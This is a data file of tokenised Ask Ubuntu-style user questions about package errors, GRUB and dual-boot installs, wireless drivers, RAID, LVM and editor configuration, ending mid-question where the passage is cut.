315115	can not add or remove packages ; errors were encountered while processing : libbz2-1.0 libbz2-1.0 : i386	i noticed ubuntu had not asked me to update in a while , which is strange . so , i opened the update manager and received the message , software index is broken it is impossible to install or remove any software . please use the package manager '' synaptic '' or run `` sudo apt-get install -f '' in a terminal to fix this issue at first . so , i started a terminal session and typed `` sudo apt-get install -f '' . here is the error message i got : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libatk1.0-0 : i386 libffmpegthumbnailer4 efibootmgr eom-common libxcb-dri2-0 linux-headers-3.2.0-45 mate-media-common beat-hazard-ultra-bin : i386 mate-screensaver-common ffmpegthumbnailer python-gtksourceview2 libcairo2 : i386 pidgin-data linux-headers-3.2.0-45-generic libgdk-pixbuf2.0-0 : i386 pluma-common libpixman-1-0 : i386 libmatewnck-common pluma libxft2 : i386 libxrandr-ltsq2 linux-headers-3.5.0-23-generic language-pack-kde-en linux-headers-3.5.0-23 kde-l10n-engb libjasper1 : i386 gtk2-engines-pixbuf indicator-status-provider-pidgin libgtksourceview2.0-0 libpango1.0-0 : i386 libmatewnck libxcb-render0 : i386 mate-utils-common libgxps2 libxcb-shm0 : i386 language-pack-kde-en-base libgtk2.0-0 : i386 libgtksourceview2.0-common use 'apt-get autoremove ' to remove them . the following packages will be removed : libbz2-1.0 : i386 0 upgraded , 0 newly installed , 1 to remove and 11 not upgraded . 2 not fully installed or removed . after this operation , 115 kb disk space will be freed . do you want to continue [ y/n ] ? y e : internal error , no file name for libbz2-1.0 i think the problem is from when i tried to install libbz2-1.0 manually and accidentally used the i386 binary instead of the amd64 one . can someone please help me fix this ? i can not install or remove anything until this is fixed , and really do n't want to have to reinstall . thank you for any help at all that you can give me .
315117	how to ignore a package in apt-get ?	so i have mysql-server-5.5 installed . i need to keep it installed and as is , but i do n't want apt-get to look at it because it continually errors when attempting to sudo apt-get install . i was looking at pinning , which i thought might work , but it gives me a file type error on my file in preferences.d when i do n't give it an extension . my file is set up as such : package : mysql-server-5.5 pin : version 5.5.31-0ubuntu-.12.04.2 pin-priority : 1000 the version was ascertained using dpkg -s mysql . how would i go about getting apt-get to ignore this package ? it 's preventing me from installing things because my package list is messed up and ca n't be repaired with these errors popping up .
315122	no sound when i change volume	ubuntu 13.04 i 've re-installed pulseaudio and indicator audio and when i change volume there is no popping sound , test sound is also missing . how to fix it ? i want my popping sound back .
315123	grub wo n't let me boot my usb	i 've installed ubuntu 12.04 on my usb flash drive ( ext2 , 400mb swap ) . the flash drive has 16gb of memory . i downloaded the live cd and i used it to install ubuntu on my usb ... here comes the problem : when i boot from my usb , grub pops up . whenever i select ubuntu from the list it shows me a purple like colored screen and 2 minutes later it shows me a black screen , white text and i can input commands in there ... has this something to do with grub ? or is it my usb drive ?
315126	how to setup auditd to monitor successful and failed login attempts	i am running 12.04 lts . aureport -l returns < no events of interest > . grep user_login /var/log/audit/audit.log also returns nothing . i was told that the user_login event is generated by login processes like sudo , sshd , login , gdm , so why are user_login events not being logged ? do i have to reconfigure something ? i know this works right out of the box in fedora , so what am i missing ?
315131	can not get webapps to work after upgrade from 12.04 to 12.10	i just upgraded to ubuntu 12.10 from 12.04 . but i can not use webapps . in fact there is no sign of them anywhere . firefox and chromium are not prompting for integration . i tried re-installing both browsers/webapps plugin of each , but no luck . out of curiosity , i tried to install unity-webapps-preview through terminal , apt-get reported that this operation is going to need 127mb . after installation , restarting session , nothing . i re-ran the unity-webapp-preview in terminal and surprisingly it again asked me that this operation is going to need 58mb . after installation , nothing . firefox is showing the unity-webapp plugin in extensions but in preferences there is noting like unity settings or options for exceptions in general tab ( as i seen in some threads ) . chromium is not even showing the plugin in extensions nor in the settings . really need help . i know there is a reported bug but it is mostly about the complains that the webapps are not working as they should but in my case they do n't seem to exist . edit : the out put of gsettings list-recursively | grep webapp is : com.canonical.unity.webapps allowed-domains @ as [ ] com.canonical.unity.webapps dontask-domains @ as [ ] com.canonical.unity.webapps index-update-time 43200 com.canonical.unity.webapps integration-allowed true com.canonical.unity.webapps preauthorized-domains [ 'amazon.ca ' , 'amazon.cn ' , 'amazon.com ' , 'amazon.co.uk ' , 'amazon.de ' , 'amazon.es ' , 'amazon.fr ' , 'amazon.it ' , 'www.amazon.ca ' , 'www.amazon.cn ' , 'www.amazon.com ' , 'www.amazon.co.uk ' , 'www.amazon.de ' , 'www.amazon.es ' , 'www.amazon.fr ' , 'www.amazon.it ' , 'one.ubuntu.com ' ]
315134	ubuntu 13.04 wifi keeps on cutting off	ubuntu keeps on cutting off and whenever it does it asks for the password and it does n't accept it . 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8191seva wireless lan controller [ 10ec:8171 ] ( rev 10 ) subsystem : hewlett-packard company device [ 103c:1467 ] kernel driver in use : rtl8192se 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : hewlett-packard company device [ 103c:1605 ] kernel driver in use : r8169 i 've heard people want this information too . so here you go .
315136	set up dual-boot	i have just installed ubuntu onto the same hdd where my windows is . it 's on another partition . when i start my computer , windows starts up . i would like to set up a dualboot choice-screen , but have no idea how to do that . please help .
315137	hp envy touchsmart 15t-j000 quad edition + custom msata plextor m5m 64gb ssd	the ssd did not come along with the laptop , so i bought one myself and physically installed it . i 've booted into ubuntu from a usb drive and my goal is to install / and /home in the ssd . ( because most of the actual media exists on the hdd ) the only problem is i 'm unable to detect the ssd while configuring the partitions . i know the ssd is not the problem because it recognizes in a different laptop . i 've followed the instructions shown in https : //help.ubuntu.com/community/uefi but that still does n't help in identifying the ssd partition . any help would be appreciated . ( p.s : i 'm wondering if i have to prepare the ssd through windows or something like that )
315138	how to reinstall dnsmasq-base	i accidentally removed dnsmasq-base following a tutorial without looking at the warnings in the comments . so what i want to know is , is there a way of getting my network manager back without losing any of my data ?
315145	will the d-link go-usb-n150 wireless n 150 easy usb adapter work without problems in ubuntu ?	my ten year old xp pc has a d-link go-usb-n150 wireless n 150 easy usb adapter . will this usb wifi adapter work well with ubuntu ?
315148	install grub from live cd	i have installed my ubuntu onto a partition on the same drive where my windows is . i would like to install grub , but can not access the ubuntu installation as windows starts instead . i am in the usb live version trying to install grub but i get this : grub-install dev\sda4 can not create directory /boot/grub/i386-pc permission denied please help me install grub .
315156	problem booting with failed software raid 1	i have been experimenting with a software raid 1 installation of ubuntu 12.04 lts in virtualbox , but am having some issues here . what i basically did : 2 disks in raid 1 . both disks contain a mirrored partition that has /boot and a mirrored partition that contains an encrypted lvm . all this so far so good , it boots perfectly after install . when i decide then to try to remove one of both disks in virtualbox , it just says `` waiting for encrypted source '' ( or something along those lines , ca n't remember exactly ) . after several more minutes , it drops to an initramfs console , where i am stuck ... and yes , i choose the option boot in degraded mode during install , i also checked in the initramfstools/conf.d , it states bootdegraded=true . what am i doing wrong here ? i thought a raid 1 was supposed to boot perfectly even if one disk completely disappears ? thanks for any help you can provide !
315159	wrong key mapping on wacom cth-470/k	having trouble with my wacom pen & touch . i set up the buttons via a shell script : # ! /bin/sh xsetwacom set `` wacom bamboo 16fg 4x5 finger pad '' button 1 `` key shift '' & xsetwacom set `` wacom bamboo 16fg 4x5 finger pad '' button 3 `` key ctrl '' & xsetwacom set `` wacom bamboo 16fg 4x5 finger pad '' button 8 `` key minus '' & xsetwacom set `` wacom bamboo 16fg 4x5 finger pad '' button 9 `` key plus '' & the `` key shift '' and `` key ctrl '' buttons work as intended . but `` plus '' and `` minus '' is acting up : xev returns for button 9 ( plus ) : keypress event , serial 38 , synthetic no , window 0x2e00001 , root 0x8e , subw 0x0 , time 103055128 , ( -234,236 ) , root : ( 500,391 ) , state 0x0 , keycode 21 ( keysym 0xb4 , acute ) , same_screen yes , xlookupstring gives 2 bytes : ( c2 b4 ) `` ´ '' xmblookupstring gives 2 bytes : ( c2 b4 ) `` ´ '' xfilterevent returns : false while pressing the + key on my keyboard produces keypress event , serial 36 , synthetic no , window 0x2e00001 , root 0x8e , subw 0x0 , time 102979366 , ( 94 , -15 ) , root : ( 828,140 ) , state 0x0 , keycode 35 ( keysym 0x2b , plus ) , same_screen yes , xlookupstring gives 1 bytes : ( 2b ) `` + '' xmblookupstring gives 1 bytes : ( 2b ) `` + '' xfilterevent returns : false the minus key produces a `` ß '' instead of `` - '' on the wacom . so where does the mix-up occur , i 'm out of ideas ... i 'm running 13.04 with gnome shell , using english system settings with german keyboard layout ( eliminate dead keys ) .
315160	i do n't give up on ubuntu , so i installed ubuntu 13.04 , but work very slow	ubuntu or nothing : ) , this is my motto . i installed ( without problems ) ubuntu 13.04 via live usb stick , on the other hand i could not do the same with ubuntu 12.04 ( installation just crashed ) . i have only ubuntu on my netbook now , but it works very slowly . what should i do : can i somehow speed up my system ? or , install an older version of ubuntu , and which one ? or try out with some other linux ? my machine is an acer aspire one d270 . processor : intel atom n2600 1.6 ghz , 1 mb l2 cache ram : 2 gb ddr3 memory hdd : 320 gb hdd graphics : intel gma 3650
315161	wifi does n't work ubuntu 13.04 . i 'm using hp pavilion dm1	i 've instaled ubuntu 13.04 in my notebook , but the wifi does n't work . what can i do ?
315164	open gl error when running steam and gnome 3 looking funky	first before i start , i would like to say i already followed the following guide for my amd radeon 7850 : what is the correct way to install ati catalyst video drivers ( fglrx ) ? i am running ubuntu 13.04 ( 64bit ) and have everything updated . i use gnome 3 as my gui . now when i launch steam it returns the following error ( btw : steam still opens ) : opengl glx context is not using direct rendering , which may cause performance problems . also when i open activities menu on gnome 3 , the background is n't transparent ... it is black , and you ca n't really see the different workspaces . any help would be appreciated !
315165	why can not wubi install ubuntu as a primary install ?	why does wubi only install inside windows vista but not as a primary os ? this is the first time i have had this issue as i have reinstalled or changed a hdd over the past couple of years . my computer is a dell inspiron 1545 .
315166	set up two ip addresses with one gateway ?	i would like to ask if it is possible to set up two static ips from same subnet through one gateway ? and how if it is ? what i am interested in is described here routing for multiple uplinks/providers , but in my case i have two ip addresses from one provider , both are on same subnet and off course i have internet access on both . i have two nics , but i do n't mind to go with one if that makes it possible . any thought is appreciated !
315171	how do i disable the fourth button on an apple mighty mouse ?	i have an apple mighty mouse , but it 's been banged up a bit . the side buttons ( 4th buttons ) are way too easily pressed . when i 'm using firefox , the 4th button can accidentally click and i 'd go back one page , which can be really aggravating . how can i disable the 4th button ( on either firefox or ubuntu ) without getting any new hardware ?
315172	is there anyway to run ubuntu only when a cd is in my computer	i am fairly new to modern linux . i would like to know if its possible to put ubuntu on a cd or dvd then load it on my computer . however i want it so if i take out the cd/dvd from the drive it will boot normal windows 7 . is this possible -thanks
315174	search inside xournal files ( .xoj )	i 'm a big fan of evernote , i use it regularly . however , it has a 60mb storage limit ( although text files are not going to occupy much space , but the limitation concern still remains ) . today , i installed xournal , which has great features like annotating , nice background , free hand shapes and notes , save in pdf format , and many more . but the big problem is that as far as i 've noticd , there is no intrinsic feature for seach inside the notes ( created using xournal with .xoj suffix ) . i used catfish file search application ( which creates bash commands for full text search ) , but it could n't help as well . is there anyway to search inside a .xoj file at all ? if so , it could be a suitable alternative to evernote , if you put your .xoj files on a cloud ( which certainly offers you much more storage space than 60mb ) . if not , is there any other convenient app similar to evernote , but with higher storage limit or without a limit ? somebody suggested zim desktop wiki app , which looks great , but i 'm nut sure if i could copy and paste everything there ( a mixture of photos and tables and text with various formats and highlights ) , like what i do with evernote . and a very useful tool i use is evernote web clipper ( browser extension ) . of course , having a desktop client like everpad is a plus , but not the absolute need . ps : i use pocket , so please do suggest that ( it only preserve links ( which might change over time ) not the actual text ) . i also use google drive or docs , i do n't like that for this purpose niether , it 's too slow , does n't have a browser extension and a desktop client . thank you so much in advance .
315180	mac dual boot ubuntu : after running command airmon-ng my screen goes off like a broken record	after running command airmon-ng my screen acts weird . why is this ? can somebody help me with this problem ? i have a macbook pro 2011 built dual boot with ubuntu .
315182	python requests ssl version	i am using the python requests module on ubuntu 13.04 . i keep getting the error : requests.exceptions.sslerror : [ errno 1 ] _ssl.c:504 : error:14077410 : ssl routines : ssl23_get_server_hello : sslv3 alert handshake failure when i use curl , it fails by default but succeeds with the -3 option . curl https : //username : password @ helloworldurl -3 this leads me to believe that it is the ssl version , which i found may be badly supported on ubuntu while searching the error . i should also note that the same code works on a mac . sooo . how do i change or check the ssl version using python preferably with requests . note : the url is private and can not be given out . sorry .
315183	how do i get my rtl8192ce based wireless device working properly ?	i am using the rtl8192cu chipset ( on a belkin wireless usb adapter n300 ) combined with 64 bit architecture and the 3.8 kernel . some of you may know that this does n't work . i tried this fix - rtl8188cu usb network adaptor on ubuntu 13.04 and now my internet is super slow . i am totally new to ubuntu and i am concerned i do not have the right driver . the `` stock '' driver was the rtl8192cu , but it did n't connect 99 % of the time and if it did the upload speed was higher than the download . right now i am connecting through my laptop with a crossover cable , so my internet connection is just fine in my apartment . relevant output from lsusb is here : bus 002 device 002 : id 050d:2103 belkin components f7d2102 802.11n n300 micro wireless adapter v3000 [ realtek rtl8192cu ] ( bonus question : is that [ 050d:2103 ] the actual physical address straight from the hardware ? or does it change when i put different drivers on it ? i am concerned i do not have the right driver )
315189	nano syntax highlighting not working for all languages	i have a funny situation where i am unable to add custom highlighting definitions to my nano text editor . the funny thing is that the predefined work like a charm and can be edited . but i have created a new one for js with $ sudo touch js.nanorc $ sudo nano js.nanorc my current js.nanorc looks like this : syntax `` javascript '' `` \.js $ '' color blue `` \ < [ -+ ] ? ( [ 1-9 ] [ 0-9 ] *|0 [ 0-7 ] *|0x [ 0-9a-fa-f ] + ) ( [ uu ] [ ll ] ? | [ ll ] [ uu ] ? ) ? \ > '' color blue `` \ < [ -+ ] ? ( [ 0-9 ] +\. [ 0-9 ] *| [ 0-9 ] *\. [ 0-9 ] + ) ( [ eepp ] [ +- ] ? [ 0-9 ] + ) ? [ ffll ] ? '' color blue `` \ < [ -+ ] ? ( [ 0-9 ] + [ eepp ] [ +- ] ? [ 0-9 ] + ) [ ffll ] ? '' color brightblue `` [ a-za-z_ ] [ a-za-z0-9_ ] * [ [ : space : ] ] * [ ( ] '' color black `` [ ( ] '' color cyan `` \ < ( break|case|catch|continue|default|delete|do|else|finally ) \ > '' color cyan `` \ < ( for|function|get|if|in|instanceof|new|return|set|switch ) \ > '' color cyan `` \ < ( switch|this|throw|try|typeof|var|void|while|with ) \ > '' color cyan `` \ < ( null|undefined|nan ) \ > '' color brightcyan `` \ < ( true|false ) \ > '' color green `` \ < ( array|boolean|date|enumerator|error|function|math ) \ > '' color green `` \ < ( number|object|regexp|string ) \ > '' color red `` [ -+/*= < > ! ~ % ? : & | ] '' color magenta `` / [ ^* ] ( [ ^/ ] | ( \\/ ) ) * [ ^\\ ] / [ gim ] * '' color yellow `` '' ( \\.| [ ^ '' ] ) * '' | ' ( \\.| [ ^ ' ] ) * ' '' color magenta `` \\ [ 0-7 ] [ 0-7 ] ? [ 0-7 ] ? |\\x [ 0-9a-fa-f ] +|\\ [ bfnrt ' '' \ ? \\ ] '' color brightblack `` ( ^| [ [ : space : ] ] ) // . * '' color brightblack start= '' /\* '' end= '' \*/ '' color brightwhite , cyan `` todo : ? '' color , green `` [ [ : space : ] ] + $ '' color , red `` + '' if anyone can see the problem then please tel me
315195	how do i list all files not managed by apt , or files that have changed since installation ?	i have just started provisioning machines using chef , and i would like to make sure that i cover as much as i can . as such , a lot of the machines i manage still have a lot of cruft , so i 'd like a way to automate viewing configurations that have changed since apt-get install , and also files that are n't managed by apt-get at all .
315196	can i store files and boot from the same external hard drive ?	is it possible to run ubuntu from an external hard drive and store files ( music , movies , games ) in that very same external hard drive ? btw the external hard drive i have is basically a 2.5 '' 200gb laptop hdd with a usb 2.0 sata enclosure . thank you very much
315200	download to file external hard drive	my netbook does not have enough hard drive space . i have tried to download ubuntu to my c : \ drive but ran out of memory . how can i download ubuntu to an external hard drive bypassing the internal hard drive ?
315202	os not found : ( ubuntu / win 7/ kali	i had two partitions with win 7 and one partition with kali linux ( debian ) . everything was working great but i got into android dev , specifically rom dev and along the way i figured there was more support on ubuntu for android dev . i decided to reduce some redundancy as i had many of the same apps on both win 7 's and the os on c : / ( the original with acer ) was a bit screwy due to my insatiable curiosity . i decided to install ubuntu 12 on c : / instead , so i have c : / , g : / and kali , ubuntu is already installed on c : / all the os 's are there but something happened to my mbr . when i try to boot up it runs a few lines and the tries a network boot ( last option in bios ) first hdd then usbs and then network is the order i have it now , it was usb first the hdd then network . then it jumps to a black screen and says `` operating system not found '' i am sure this is a common problem , i tried to reinstall ubuntu with several different setup options while being careful not to overwrite the other two os 's . i think grub tried to take over my mbr . i used to be able to boot up and choose to boot either one of the win 7 's or kali and when i chose kali it would boot grub2 , so i had mbr to boot into windows or kali and if i choose kali mbr would boot grub2 to boot into kali . any advice would be great , my last option is to back up my media and settings then to reinstall everything from scratch which would probably take a week to accomplish with my schedule .
315207	grub failed to install to the following devices error on upgrade	i 'm upgrading an old laptop from 12.04 to 12.10 , but during the process i 'm getting some errors relating to the grub upgrade . after some googling i found a suggestion to purge grub and reinstall the packages . on install , this time grub prompted me to choose the install device : grub install devices : [ ] /dev/sda ( 64023 mb ; toshiba_thnsnc064gmmj ) [ ] /dev/sdb ( 64023 mb ; toshiba_thnsnc064gmmj ) [ ] /dev/dm-5 ( 35145 mb ; isw_bdegajgjcj_volume0 ) this machine has a ~35g partition with ubuntu on , and a larger partition with windows on . df gives me : filesystem size used avail use % mounted on /dev/mapper/isw_bdegajgjcj_volume0p5 33g 24g 7.5g 76 % / udev 1.8g 12k 1.8g 1 % /dev tmpfs 726m 1016k 725m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.8g 2.2m 1.8g 1 % /run/shm grub-mount 33g 24g 7.5g 76 % /var/lib/os-prober/mount /dev/mapper/isw_bdegajgjcj_volume0p3 78g 65g 13g 85 % /media/acaebda1aebd648c /dev/mapper/isw_bdegajgjcj_volume0p2 100m 25m 76m 25 % /media/system reserved so i picked /dev/dm-5 . but that gives me the error : grub failed to install to the following devices : /dev/dm-5 on another grub devices post i found someone asking for the output of sudo parted -l , so here 's mine : https : //gist.github.com/tfountain/e1a56e9d1a76ef2f8406 . should i be selecting one of the other install devices ( one of which i assume is my windows partition ? ) why does the parted output list so many partitions ?
315208	how to uninstall ubuntu 9.10 from win xp / wubi ?	i have installed ubuntu 9.10 via a disk onto a windows xp computer . windows is in the first partition . i later installed ubntu 12.10 via wubi when the compuuter boots i pick from ubuntu or windows on sda1 . when i boot windows my wubi ( 12.10 ) option shows up asking me if i want to use ubuntu 12.10 or windows . i am wondering how i remove ubuntu 9.10 from the computer but keep 12.10 ( wubi ) while using windows xp .
315212	trying to install mate desktop enviroment , getting `` unable to correct problems , you have held broken packages ''	so like the title says , im trying to install the mate desktop enviroment with the terminal , and i 'm using the wiki instructions at http : //wiki.mate-desktop.org/download - but everytime i enter `` sudo apt-get install mate-core '' , i get stuck with this.. username @ computer : ~ $ sudo apt-get install mate-core reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mate-core : depends : mate-control-center ( > = 1.6.0 ) but it is not going to be installed depends : caja ( > = 1.6.0 ) but it is not going to be installed depends : marco ( > = 1.6.0 ) but it is not going to be installed depends : mate-session-manager ( > = 1.6.0 ) but it is not going to be installed depends : mate-panel ( > = 1.6.0 ) but it is not going to be installed depends : mate-settings-daemon ( > = 1.6.0 ) but it is not going to be installed depends : mate-terminal ( > = 1.6.0 ) but it is not going to be installed depends : mate-desktop ( > = 1.6.0 ) but it is not going to be installed depends : libmatekbd ( > = 1.6.0 ) but it is not going to be installed depends : libmatedesktop ( > = 1.6.0 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i 'm not really sure what this means since im a complete noob with ubuntu..can anybody help ?
315221	cd does n't work ? ( os x )	i downloaded ubuntu 13.04 64-bit version , converted it to .img , and successfully burned it to a cd . but when i inserted the cd , it said , this disk is not readable by this computer . what do i do ?
315222	windows xp does n't see a partition after removing ubuntu . how to restore an access to it ?	i have removed ubuntu from my dual-boot machine . i just manually deleted ubuntu partition being under windows . i used `` disk manager '' for that operation . then i restarted the computer with windows cd and restored mbr with windows restore console and fixmbr command . everything is ok , windows boot works fine . but now it seems that windows does n't see that partition ( where ubuntu was ) . i can not create any new logical partition on that place . when i try to create a partition windows throws an error . what happened and how can i restore the access to that partition from windows ? i want to try lubuntu ( because ubuntu was slow ) . i have 60 gb partition dedicated for some linux as the second os . i want to allocate 10 gb of it for a fat32 shared partition . the rest ( 50 gb ) is for lubuntu . it was exactly the same settings for ubuntu . now i want to do the same for lubuntu , but windows now can not see that 60 gb partition . how to restore the access ? when i try to create a partition windows throws an error . it says : an unexpected error happened . check a journal of system events . close the window of the disk manager and start it again or restart a computer . i tried both , i closed a window and restarted a computer . did n't help . the error happens every time i try to create a partition on that place ( 60 gb partition ) . the error from the journal of system events : source : ldm category : no category type : error id : 2 text : wrong parameter ( 80070057 ) .
315224	why libreoffice is default instead of openoffice.org	i have read before some articles about openoffice.org ( ooo ) . they were saying that because of the status of ooo before it is maintained by apache , the distros avoided distributing ooo along with the installations . now since ooo is maintained by apache , why do n't distros use ooo again ? do you have any idea about cons and pros of libreoffice against ooo ?
315227	will a usb ubuntu 12.04 boot image work if copied to a cd/dvd ?	i have an old computer ( hp d220 mt ) running ubuntu 12.04 . i recently made a usb pen drive boot image ( in case my hard drive crashes ) , but the bios wo n't let me boot from usb ( booting from cd's/dvd 's works fine ) . i ca n't directly create a cd or dvd as my computer can only read cd/dvd 's ( no write available ) . my question : if i copy the usb pen drive directories/files to a cd or dvd ( on a different computer ) . will my computer have a crying chance to successfully boot from this cd/dvd ? thanks .
315230	solarized theme in terminal vim on xubuntu	i recently setup my laptop with xubuntu 13.04 and after installing and setting up all my dotfiles , which have previously worked fine with ubuntu 13.04 with xfce installed , my colorscheme in vim is using the wrong colors . i dropped the terminalrc file from the solarized repository in ~/.config/xfce4/terminal/terminalrc and setup my dotfiles ( which can be found at http : //github.com/davejlong/dotfiles ) . here is a screen shot of my temrinal when i open a file in vim : here is the contents of ~/.config/xfce4/terminal/terminalrc : [ configuration ] colorcursor= # 0f0f49499999 colorforeground= # 838394949696 colorbackground= # 00002b2b3636 colorpalette1= # 070736364242 colorpalette2= # dcdc32322f2f colorpalette3= # 858599990000 colorpalette4= # b5b589890000 colorpalette5= # 26268b8bd2d2 colorpalette6= # d3d336368282 colorpalette7= # 2a2aa1a19898 colorpalette8= # eeeee8e8d5d5 colorpalette9= # 00002b2b3636 colorpalette10= # cbcb4b4b1616 colorpalette11= # 58586e6e7575 colorpalette12= # 65657b7b8383 colorpalette13= # 838394949696 colorpalette14= # 6c6c7171c4c4 colorpalette15= # 9393a1a1a1a1 colorpalette16= # fdfdf6f6e3e3 term=xterm-256color fontname=inconsolata medium 12 miscalwaysshowtabs=false miscbell=false miscbordersdefault=true misccursorblinks=false misccursorshape=terminal_cursor_shape_block miscdefaultgeometry=80x24 miscinheritgeometry=false miscmenubardefault=true miscmouseautohide=false misctoolbardefault=false miscconfirmclose=true misccycletabs=true misctabclosebuttons=true misctabclosemiddleclick=true misctabposition=gtk_pos_top mischighlighturls=true miscscrollalternatescreen=true
315239	auto-mount a volume group on startup ?	i have two physical volumes ( /dev/sda3 and /dev/sdb1 ) connected to one volume group ( fileserver ) . when i boot up my computer and open up the file explorer , on the left , i see a devices pane that says my volume group . however , i can not connect to this server from any client until i click it . clicking the volume group mounts it because it shows the eject arrow sign right next to it . as soon as i click it , then i am able to connect to the server and see my files . my question is : how do i automate this process every time ubuntu starts ? i tried going to the startup applications and using this command mount /dev/mapper/fileserver-media /media/bfbe53bd-3306-401b-a8df-4363564cf1fc but it did n't seem to do anything . i attached a picture to show what i mean . this is what it looks like when i turn on my computer . http : //i1285.photobucket.com/albums/a582/sameetandpotatoes/before_zpsa67a3e4f.png now , this is what it looks like when i click on the device : http : //i1285.photobucket.com/albums/a582/sameetandpotatoes/2_zps5c91a322.png here are the terminal outputs of pvscan , vgscan , etc . sameet @ sapraserver : ~ $ sudo pvscan pv /dev/sda3 vg fileserver lvm2 [ 216.07 gib / 18.89 gib free ] pv /dev/sdb1 vg fileserver lvm2 [ 232.83 gib / 0 free ] total : 2 [ 448.89 gib ] / in use : 2 [ 448.89 gib ] / in no vg : 0 [ 0 ] sameet @ sapraserver : ~ $ sudo vgscan reading all physical volumes . this may take a while ... found volume group `` fileserver '' using metadata type lvm2 sameet @ sapraserver : ~ $ sudo lvdisplay -- - logical volume -- - lv name /dev/fileserver/media vg name fileserver lv uuid lry16c-bnwh-ffva-avdw-gtx6-2vig-urrgpd lv write access read/write lv status available # open 2 lv size 430.00 gib current le 110080 segments 2 allocation inherit read ahead sectors auto currently set to 256 block device 252:0 thanks in advance for your help .
315241	how do i setup network manager and vpn on ubuntu server with vnc/xfce4 ?	i have an amazon ec2 micro instance that i use for semi-anonymous web browsing , but just to be safe , i would like to use network manager to setup a vpn . when i login to vnc and try to use network manager , it says network manager is not running . how do i start network manager to access a vpn server ?
315242	ubuntu 13.04 alongside windows 8 - how to partition from windows	i plan to install ubuntu 13.04 alongside windows 8 , and i 'm looking for a clear answer on how to conduct partitioning appropriately . i 'm very new to all of this so a thorough explanation with minimal jargon would be great . i have an acer aspire m5 x64 with 6g ram . i think i already figured out how to deal with the fast startup , uefi and secureboot issues ( i disabled fast startup and disabled secure boot ) . i am able to boot into ubuntu from a liveusb , and i think i am ready to install ubuntu . note - despite some advice found here , i do have to disable secureboot to boot 13.04 from my liveusb . from what i have read here , it seems that i should ( at least at first ) create the partitions from within windows 8 , not from the liveusb , to avoid reported problems . i have run compmgmt.msc and i see the existing partitions . i see the following : disk 0 : 400 mb recovery ; 300 mb efi system ; acer ( c : ) 444.95 gb ( boot , page file , crash dump , primary partition ) ; 20 gb recovery disk 1 : 3.74 gb primary partition ; 14.90 gb primary partition i gather i need to create a mounting point '/ ' partition ( ? ? ) , a swap partition , and a home partition . please explain what these are , how big they should be , how i create them from windows disk management , and anything else i need to know . eventually , i plan to fully replace windows 8 with ubuntu , but for now i want to run alongside windows 8 and not screw things up . i do n't have any critical files saved on this computer yet . thanks .
315243	how to add grant permissions to a group ?	i have created a group 'programmer ' which must have full rights to folder /var/www/ . how can i give these permissions to this group and later on i will add users to it .
315245	broadcom bcm4311 wireless not recognized in usb live install of 13.10 on dell 6400 laptop	broadcom bcm4311 wireless not recognized in usb live install of 13.10 on dell 6400 laptop hardware : dell laptop 6400 1.66 ghz and 2gb ram usb live created with a 4 gb persistent file . upon startup i get a functional ethernet wired connection and bluetooth but no indications of a wireless service . there is no hardware switch for the wireless as on some laptops . the soft switch ( fn+f2 ) toggles the bluetooth on and off but the wireless indicator never lights up . when probing around , this is what i find : **rfkill list** //is it being killed ? no , wireless not even listed 0 : hci0 : bluetooth soft blocked : no hard blocked : no **iwconfig** // look specifically at the parameters of the wireless network lo no wireless extensions . eth0 no wireless extensions . **ifconfig** // look at interface configurations > eth0 link encap : ethernet hwaddr 00:19 : b9:4c : cf : b3 > inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 > inet6 addr : fe80 : :219 : b9ff : fe4c : cfb3/64 scope : link > up broadcast running multicast mtu:1500 metric:1 > rx packets:3826 errors:0 dropped:0 overruns:0 frame:0 > tx packets:2033 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:1000 > rx bytes:3944231 ( 3.9 mb ) tx bytes:197816 ( 197.8 kb ) > interrupt:17 > lo link encap : local loopback > inet addr:127.0.0.1 mask:255.0.0.0 > inet6 addr : : :1/128 scope : host > up loopback running mtu:65536 metric:1 > rx packets:264 errors:0 dropped:0 overruns:0 frame:0 > tx packets:264 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:0 > rx bytes:26685 ( 26.6 kb ) tx bytes:26685 ( 26.6 kb ) **lspci -k | grep -a2 network** //hardware and driver > 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) > subsystem : dell wireless 1390 wlan mini-card > kernel driver in use : b43-pci-bridge > **cat /etc/modprobe.d/blacklist.conf | grep -b1 bcm** //check what 's blacklisted > # replaced by b43 and ssb . > blacklist bcm43xx do you have any ideas on how to get this working ? i have searched the previous questions and have tried several of the answers offered -- but no joy . it looks like these cards have been a problem for almost every release of ubuntu and it seems that with every release there is a different twist that must be used to get it to work .
315246	first boot after ubuntu install - black screen w/ responsive cursor	i decided to revitalize my very old desktop , running windows xp , by dual booting ubuntu . at first , i was planning to replace windows w/ ubuntu , but at this point i 'm glad i did n't do that since i can not get ubuntu to work ! i installed ubuntu 13.04 with a live cd ( dvd ) and everything seemed to go smoothly . i created a swap partition at 2gb , computer has 512mb of ddr memory but i may upgrade it slightly to 1gb in the near future . windows has its own single partition , 10gb in size , while i left ubuntu with about 67gb mounted as `` / '' . i want to point out somewhere that this computer does not presently have access to the internet - i have a qwest ( actiontec ) 812ain usb adapter which works fine on windows but i do not believe it works with linux os . i have seen several questioners fail to get it to work around the 'net , such as here . my plan is/was to install ubuntu successfully , tinker to see if i can get it to work , and then buy a usb wi-fi adapter that is known to work on linux if that does n't work out . i figure this is relevant since it will be very difficult for me to get drivers and things like that via cd boot or anything . anyway , other than lacking internet as i expected , installation seemed to go well . unfortunately , after my first boot , unity never appeared . after seeing the ubuntu logo and the dots indicating loading , the screen goes to black with only my cursor visible . the cursor is responsive and appears to turn into the text version of itself when i hover over the middle part of the screen ( there is probably better nomenclature for that , but i mean to say the way it changes appearance when hovering over text ) . from there , i ca n't do anything . i tried to summon a terminal via ctrl+alt+t , but no luck . i have to do a hard power 